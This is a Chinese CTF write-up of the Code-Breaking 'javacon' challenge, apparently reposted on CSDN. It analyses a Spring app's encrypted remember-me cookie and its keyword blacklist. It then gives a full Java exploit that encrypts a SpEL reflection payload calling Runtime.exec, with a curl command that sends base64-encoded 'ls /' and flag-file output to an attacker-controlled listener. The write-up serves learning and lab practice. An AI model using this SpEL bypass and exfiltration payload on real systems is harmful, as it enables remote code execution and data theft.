java con_java安全学习-Code-Breaking Puzzles-javacon详细分析

最新推荐文章于 2023-02-21 22:05:25 发布
最新推荐文章于 2023-02-21 22:05:25 发布
阅读量327 收藏
点赞数
文章标签: java con
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29782509/article/details/114463109
版权

本文首发于合天智汇:

https://mp.weixin.qq.com/s/XWpe3OGwH1d9dYNMqfnyzA

0x01.环境准备

需要反编译的jar包如下所示

de493115de04482a15436dd212cc3deb.png

直接通过以下步骤将jar文件导入到idea中,就可以获得源码文件

1b2a9b9959374641610bcb462d1d4975.png

如下所示我们就可以获得反编译后的几个重要的类和一些配置文件

0ee3b6182bd9416516c212dda2827ad7.png

0x02.题目分析

主要的逻辑在MainController类中

@GetMappingpublic String admin(@CookieValue(value = "remember-me",required = false) String rememberMeValue, HttpSession session, Model model) {if (rememberMeValue != null && !rememberMeValue.equals("")) {

String username= this.userConfig.decryptRememberMe(rememberMeValue);if (username != null) {

session.setAttribute("username", username);

}

}

Object username= session.getAttribute("username");if (username != null && !username.toString().equals("")) {

model.addAttribute("name", this.getAdvanceValue(username.toString()));return "hello";

}else{return "redirect:/login";

}

}

从这一段代码可以看到此时将从cookie中获取remember-me的值赋给rememberMeValue,若其不为空,则调用userconfig类中的decryptRememberMe对其进行解密,解密的逻辑在BOOT-INF\classes\io\tricking\challenge\UserConfig.class,其中加密和解密调用主要为以下两个函数

96e18979bb3e316cba440b8a4dd7a835.png

而解密方法中用到了remembermekey,此key在appalication.yml中

3d8f69e20263e10dd73f2627866bad3b.png

解密方法也是自己定义的一个类中实现的:

importjava.util.Base64;importjavax.crypto.Cipher;importjavax.crypto.spec.IvParameterSpec;importjavax.crypto.spec.SecretKeySpec;importorg.slf4j.Logger;importorg.slf4j.LoggerFactory;public classEncryptor {static Logger logger = LoggerFactory.getLogger(Encryptor.class);publicEncryptor() {

}public staticString encrypt(String key, String initVector, String value) {try{

IvParameterSpec iv= new IvParameterSpec(initVector.getBytes("UTF-8"));

SecretKeySpec skeySpec= new SecretKeySpec(key.getBytes("UTF-8"), "AES");

Cipher cipher= Cipher.getInstance("AES/CBC/PKCS5PADDING");

cipher.init(1, skeySpec, iv);byte[] encrypted =cipher.doFinal(value.getBytes());returnBase64.getUrlEncoder().encodeToString(encrypted);

}catch(Exception var7) {

logger.warn(var7.getMessage());return null;

}

}public staticString decrypt(String key, String initVector, String encrypted) {try{

IvParameterSpec iv= new IvParameterSpec(initVector.getBytes("UTF-8"));

SecretKeySpec skeySpec= new SecretKeySpec(key.getBytes("UTF-8"), "AES");

Cipher cipher= Cipher.getInstance("AES/CBC/PKCS5PADDING");

cipher.init(2, skeySpec, iv);byte[] original =cipher.doFinal(Base64.getUrlDecoder().decode(encrypted));return newString(original);

}catch(Exception var7) {

logger.warn(var7.getMessage());return null;

}

}

}

解密用到key,初始向量,以及密文,类SecretKeySpec根据提供的字节数组来生成指定算法的key,这里生成AES加密的密钥,类IvParameterSpec根据字节数组生成初始向量,Ciper类提供了java核心的加密解密算法体系,通过调用getInstance()方法我们就可以生成可以进行提供加密的对象,入口参数为我们需要使用的加密算法,以及对应的反馈模式以及填充模式,比如上面代码中的Cipher.getInstance("AES/CBC/PKCS5PADDING");,之后需要对该对象初始化,指定我们要进行的操作为加密或者解密,通过指定模式来定义,1为加密,2为解密,第二个参数即为密钥,第三个参数为我们指定的加密算法所需要的参数,AES加密需要初始的IV,这里我们传递一个IV进去,init初始结束以后,我们就可以进行解密操作,这里直接通过调用ciper.dofinal()方法来进行解密,然后返回字节数组存在original变量中转成字符串进行返回

4aad7a0c62a106c7c9136e1ccbad3e91.png

之后讲从session中取出username,然后通过model.addAttribute()方法来设置model的键值,这里涉及到Spring MVC中Controller如何将数据返回给页面,

要实现Controller返回数据给页面,Spring MVC 提供了以下几种途径:

ModelAndView:将视图和数据封装成ModelAndView对象,作为方法的返回值,数据最终会存到HttpServletRequest对象中!

Model对象:通过给方法添加引用Model对象入参,直接往Model对象添加属性值。那么哪些类型的入参才能够引用Model对象,有三种类型,分别是org.springframework.ui.Model、org.springframework.ui.ModelMap 或 java.uti.Map。只要是这些类型的入参,都是指向Model对象的,而且不管定义多少个这些类型的入参都是指向同一个Model对象!

@SessionAttributes:通过给Controller类添加@SessionAttributes注解,该注解的name和value属性值都是Model的key值,意思是指Model中这些key对应的数据也会存到HttpSession,不仅仅存到HttpServletRequest对象中!这样页面可以共享HttpSession中存的数据了!

@ModelAttribute:使用@ModelAttribute注解的方法会在此Controller每个方法执行前被执行,指定@ModelAttribute的name或value都是一样的功能,都是作为key,将注解的方法返回的对象作为value存放到Model中,不指定name和value的话,则以注解的方法返回的类型名称首字母小写作为key。

除了上述的途径,也可以使用传统的方式,那就是直接使用HttpServletRequest或HttpSession对象来存数据,页面上再去取。

注意:Model中存的数据,最终都会存放到HttpServletRequest对象中,页面上可以通过HttpServletRequest对象获取数据。

而这里赋给name的值要经过getAdvanceValue()函数进行处理

privateString getAdvanceValue(String val) {

String[] var2= this.keyworkProperties.getBlacklist();int var3 =var2.length;for(int var4 = 0; var4 < var3; ++var4) {

String keyword=var2[var4];

Matcher matcher= Pattern.compile(keyword, 34).matcher(val);if(matcher.find()) {throw newHttpClientErrorException(HttpStatus.FORBIDDEN);

}

}

ParserContext parserContext= newTemplateParserContext();

Expression exp= this.parser.parseExpression(val, parserContext);

SmallEvaluationContext evaluationContext= newSmallEvaluationContext();returnexp.getValue(evaluationContext).toString();

}

}

首先定义var2变量为一些黑名单中的字符,然后通过循环判断解密以后的username中是否包含这些非法字符,这里通过正则来进行过滤,java正则表达式通过java.util.regex包下的Pattern类与Matcher类实现。

Pattern类用于创建一个正则表达式,也可以说创建一个匹配模式,它的构造方法是私有的,不可以直接创建,但可以通过Pattern.complie(String regex)简单工厂方法创建一个正则表达式,比如

Pattern p=Pattern.compile("exec");

p.pattern();

其中pattern() 返回正则表达式的字符串形式,也就是exec,所以这里就是将黑名单中的关键字依次进行字符串正则匹配,具体的黑名单在根据BOOT-INF/classes/io/tricking/challenge/KeyworkProperties.class中的定义可以在BOOT-INF/classes/application.yml中找到blacklist:

f54399820c32bddcead55562a1b53f6c.png

75f9c7c00ceb9070bd59cb1dd620f2c3.png

find()对字符串进行匹配,匹配到的字符串可以在任何位置

Pattern p=Pattern.compile("\\d+");

Matcher m=p.matcher("tr1ple2333");

m.find();//返回true

通过Pattern.compile(keyword, 34).matcher(val)就能够对username值进行匹配,如果没有匹配到黑名单的话接下来就要进行spel处理,这里介绍一下spel。Spring Expression Language(简称 SpEL)是一种功能强大的表达式语言、用于在运行时查询和操作对象图;语法上类似于 Unified EL,但提供了更多的特性,特别是方法调用和基本字符串模板函数。

通常使用SPEL求表达式的值时可以分为以下几步:

1.创建解析器:Spel 使用 ExpressionParser 接口表示解析器,提供 SpelExpressionParser 默认实现;

2be51ffcbd9c33315693e05dfed1e63f.png

2.解析表达式:使用 ExpressionParser 的 parseExpression 来解析相应的表达式为 Expression 对象。

ea69f16ffb9b964350d66cd0959ddcaf.png

其中var即为username的值,也就是我们可以注入的表达式,ParserContext 接口用于定义val所表示的字符串表达式是不是模板,及模板开始与结束字符,也就是我们注入的表达式以#{开头,以}结尾

3.构造上下文:准备比如变量定义等等表达式需要的上下文数据。

b5d2b9d0297123dd17849871005bdc11.png

4.求值:通过 Expression 接口的 getValue 方法根据上下文获得表达式值。

96f52cc800358dedf68e2d204e80e780.png

至此为止,触发SPEL的基本逻辑我们已经清楚了,那么接下来只需要加payload进行加密,并赋给remember-me作为cookie发送即可,在构造payload之前我们需要知道spel是支持多种表达式的,我们通过通过Runtime.getruntime().exec()来执行命令,因此为了能够让spel执行exec()函数,我们可以使用类类型的表达式

使用T(Type)来表示java.lang.Class实例,"Type"必须是类全限定名,"java.lang"包除外,即该包下的类可以不指定包名;

使用类类型表达式还可以进行访问类静态方法及类静态字段。

根据blacklist的过滤,我们不能直接执行 Runtime.getruntime().exec(),但是我们可以使用反射的方法来执行exec函数,这里要用到多次反射,spel表达式的payload格式如下所示

cee2574fff7334537a17413a70e8cb2e.png

我们知道通常一层反射有如下形式:

Class test = Test.class;

Method method= test.getMethod("hack",String.class);

String x= (String)method.invoke(new Test("tr1ple"),"23333");

其中test是一个类类型的对象,通过其我们可以访问类中定义的成员方法,Test是一个我们定义的类,我们想要执行该类的hack方法,通过以上三行就能够完成反射调用hack方法,其中23333为传入的hack方法的入口参数,回到Spel的payload的构造上,这里直接通过最外层的invoke函数来通过T(String).getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('getRu'+'ntime').invoke(T(String).getClass().forName('java.la'+'ng.Ru'+'ntime'))反射出一个Runtime对象来执行exec函数,其中反射runtime对象的过程中又使用了一个invoke()来调用getruntime函数,从而能够成功返回Runtime对象,并且此时invoke的第二个参数即为command,也就是我们需要传给exec进行执行的命令,这样就能够利用字符串拼接成功绕过blacklist的过滤来执行命令。

0x03.题目复现

因为exec执行命令是没有回显的,因此我们curl将结果带出,首先执行

curl 192.168.127.129:2345/`ls / | base64 | tr "\n" *`

8c40d0505a37be82dae69065ce4120a1.png

这里直接执行ls / base64将出现\n,因此用tr将\n替换成任意base64编码表以外的字符即可

10b5a7c9d2da41adfd703a3ddfd4e44b.png

因为源码中已经给出了encrypt方法,我们直接copy出来加密我们的payload即可

exp:

importjavax.crypto.BadPaddingException;importjavax.crypto.IllegalBlockSizeException;importjavax.crypto.NoSuchPaddingException;importjavax.crypto.spec.IvParameterSpec;importjava.io.UnsupportedEncodingException;importjava.security.InvalidAlgorithmParameterException;importjava.security.InvalidKeyException;importjava.security.NoSuchAlgorithmException;importjava.util.Base64;importjavax.crypto.Cipher;importjavax.crypto.spec.SecretKeySpec;classEncryptor{public staticString encrypt(String key, String initVector, String value){try{

IvParameterSpec iv= new IvParameterSpec(initVector.getBytes("UTF-8"));

SecretKeySpec skeySpec= new SecretKeySpec(key.getBytes("UTF-8"),"AES");

Cipher cipher= Cipher.getInstance("AES/CBC/PKCS5PADDING");

cipher.init(1, skeySpec, iv);byte[] encrypted =cipher.doFinal(value.getBytes());returnBase64.getUrlEncoder().encodeToString(encrypted);

}catch(UnsupportedEncodingException e) {

e.printStackTrace();

}catch(NoSuchAlgorithmException e) {

e.printStackTrace();

}catch(NoSuchPaddingException e) {

e.printStackTrace();

}catch(InvalidKeyException e) {

e.printStackTrace();

}catch(InvalidAlgorithmParameterException e) {

e.printStackTrace();

}catch(IllegalBlockSizeException e) {

e.printStackTrace();

}catch(BadPaddingException e) {

e.printStackTrace();

}return null;

}

}public classMain {public static voidmain(String[] args) {

System.out.println(Encryptor.encrypt("c0dehack1nghere1", "0123456789abcdef", "#{T(String).getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('ex'+'ec',T(String[])).invoke(T(String).getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('getRu'+'ntime').invoke(T(String).getClass().forName('java.la'+'ng.Ru'+'ntime')), new String[]{'/bin/bash','-c','curl 192.168.127.129:2345/`ls /|base64|tr \"\n\" \"-\"`'})}"));

}

}

burp中cookie添加remember-me的cookie

0d76346d4109d41fd227bf0a7956e1cb.png

此时本地的2345端口将收到请求

d616565ba88e787cddeab02c376f6cac.png

此时解码就能看到flag文件了,此时只要继续加密curl 192.168.127.129:2345/`cat flag_j4v4_chun|base64`即可得到flag

c863b71ac88f525101dbd76d40eec81d.png

继续加密第二条command并发送cookie,解码后就能获得flag

57d4b8623d00fd232f21761a4ffc63db.png

67a40e3f9d05c84f8e52fe8a0f366df9.png

0x04.总结:

这道题涉及到spring spel表达式注入和payload构造中java反射,也学到了java开发中的很多东西,有兴趣的同学可以去复现https://github.com/phith0n/code-breaking

参考:

金牛座万大爺
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java throw e 报错_Java基本概念:异常
weixin_34357614的博客
02-16 954
一、简介描述:异常(Exception)指不期而至的各种状况,异常发生的原因有很多,通常包含以下几大类:用户输入了非法数据。要打开的文件不存在。网络通信时连接中断,或者JVM内存溢出。异常是一个事件,它发生在程序运行期间,干扰了正常的指令流程。Java语言在设计的当初就考虑到这些问题,提出异常处理的框架的方案,所有的异常都可以用一个异常类来表示,不同类型的异常对应不同的子类异常(目前我们所说的异常...
代码审计Code-Breaking Puzzles学习记录
酉酉的博客
12-12 753
文章目录前言easy - functionpayloadeasy - pcrewafpayloadeasy - phpmagicpayloadeasy - phplimitpayload 前言 Code-Breaking Puzzles是一场完全开放源代码的Web解密游戏,其包含但不限于PHP、Java、Node.js、Python等语言的代码审计知识。 p师傅的知识星球真是干货多多,刚刚加入就...
code-breakingjavacon
snowlyzz的博客
02-21 527
CTF中SpEL注入题型
java con_java基础-接口
weixin_36315722的博客
02-21 619
浏览以下内容前,请点击并阅读接口是java语言中的一个引用类型,和类一样,接口可以包含常量,方法签名,默认方法,静态方法和嵌套类型。含有方法主体的只有其中的默认方法和静态方法。接口不能被实例化,它们只能被类实现或者被其他接口继承。接口的声明部分包含修饰词,关键词interface,接口名称,extends关键词+由逗号分隔开的继承接口名称(可有可无),和一个接口主体,如下例所示:public in...
Java并发包:ConcurrentMap
热门推荐
charming的专栏
07-08 1万+
文章译自:http://tutorials.jenkov.com/java-util-concurrent/index.html 抽空翻译了一下这个教程的文章,后面会陆续放出,如有不妥,请批评指正。 转自请注明出处。 之前漏了一篇文章,这篇应该是在双端队列之后的,这里补上。ConcurrentMapjava.util.concurrent.ConcurrentMap接口代表一个Map,它可
JAVA-Puzzles-section.zip_java笔试题
09-19
java智力题,本文档例举了许多在笔试中有很大可能会考核的智力题,主要涉及JAVA逻辑思维能力,以及部分算法
行业教育软件-学习软件-Animated Puzzles3 1.0 英文版.zip
08-01
行业教育软件-学习软件-Animated Puzzles3 1.0 英文版.zip
行业教育软件-学习软件-Animated Puzzles2 1.0 英文版.zip
08-01
行业教育软件-学习软件-Animated Puzzles2 1.0 英文版.zip
N-puzzles:使用最小优先级队列解决N个难题
05-14
N个谜题笔记使用SearchNode类来记录Board,先前的SearchNode以及到其当前状态的移动次数,并且应该是先前的moves+1 打破平局的时机很重要免疫提高了程序的性能已通过的测试用例puzzle00~03puzzle2x2-**~06puzzle3x3-...
行业教育软件-学习软件-软件下载_学习软件_早教启蒙_Puzzles 2_ Fantasy Pieces免费下载.zip
08-03
行业教育软件-学习软件-软件下载_学习软件_早教启蒙_Puzzles 2_ Fantasy Pieces免费下载.zip
accp6.0 y2 影院信息查询Cinema
04-22
accp6.0 y2 影院信息查询Cinema 使用Hibernate开发租房系统第7章(影院信息查询 Cinema)
javaconlinux
12-21
java连接linux执行shell命令, 远程上传文件下载文件。
Javabreak和contunie加(label)标签的用法
weixin_30278311的博客
11-24 166
Thinking in java 对”goto “关键字的简单介绍 臭名昭著的“goto” goto 关键字很早就在程序设计语言中出现。事实上,goto 是汇编语言的程序控制结构的始祖:“若条件 A, 则跳到这里;否则跳到那里”。若阅读由几乎所有编译器生成的汇编代码,就会发现程序控制里包含了许多 跳转。然而,goto 是在源码的级别跳转的...
Java入门Conllection,初识List、Set、Map 以及 各常用实现类对比
γìńɡ雄尐年ぐ的博客
04-28 867
java语言是由C++语言改造而来的,当年响当当的数组,在操作的时候多有不便,因为数组初始容量不够的问题,可能在编程的过程中总会遇到,这个数组不够了怎么办,然后我们就要手动去写一个方法来解决这个问题。久而久之,java提供了一种自动帮你解决各种数组问题的强大工具,它就是List。【java的强大和让多数人的喜爱以及低难度的入门,多数来源于他强大的API(Application Programmin...
java里面com.是什么意思
yeqiuBOke的博客
07-03 1万+
由于Java面向对象的特性,每名Java开发人员都可以编写属于自己的Java Package,为了保障每个Java Package命名的唯一性,在最新的Java编程规范中,要求开发人员在自己定义的包名前加上唯一的前缀。由于互联网上的域名称是不会重复的,所以多数开发人员采用自己公司在互联网上的域名称作为自己程序包的唯一前缀。例如: com.sun.swt.……...
Java并发编程(Java Concurrency)(11)- Java 内存模型
JackLang的博客
11-19 632
摘要:这是翻译自一个大概30个小节的关于Java并发编程的入门级教程,原作者Jakob Jenkov,译者Zhenning Lang,转载请注明出处,thanks and have a good time here~~~(希望自己不要留坑)
java多重循环中break,conitnue以及相关标签的用法
xulei_19850322的专栏
12-03 3199
/** * File: com.dol.dop.exams.BreakAndContinue.java * CreateDate: 2009-12-3 * Author: xulei * Despriction:多重循环中break 和conitnue的用法 */package com.dol.dop.exams;public class BreakAndContinue { public v
idea 项目jar反编译java_java安全学习-Code-Breaking?Puzzles-javacon详细 分析
weixin_39622587的博客
11-29 108
本文转自公众号 合天智汇作者:tr1ple原创投稿活动:http://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ0x01.前言最近在学习java安全,正好Code-Breaking系列有一道java代码审计相关的题目,这里详细分析一下这道题目,希望能和师傅们共同进步~0x02.环境准备需要反编...
Code-Breaking Puzzles 做题记录
fnmsd的博客
11-28 3601
Code-Breaking Puzzles Writeup 代码审计圈子里看到Code-Breaking Puzzles,跟着学习着做下。 地址:https://code-breaking.com/ 给P神的代码审计圈子打个广告,199元你买不了吃亏买不了上当: easy - pcrewaf 这个题最开始做上来的,但是做出来了个非预期解。 最开始的题目: &amp;amp;amp;amp;amp;lt;?php function is...
111+222+333+444等于几
最新发布
08-27
- *1* *2* [puzzles —— 111、222、333、444、555、666、777、888、999](https://blog.csdn.net/lanchunhui/article/details/52087702)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值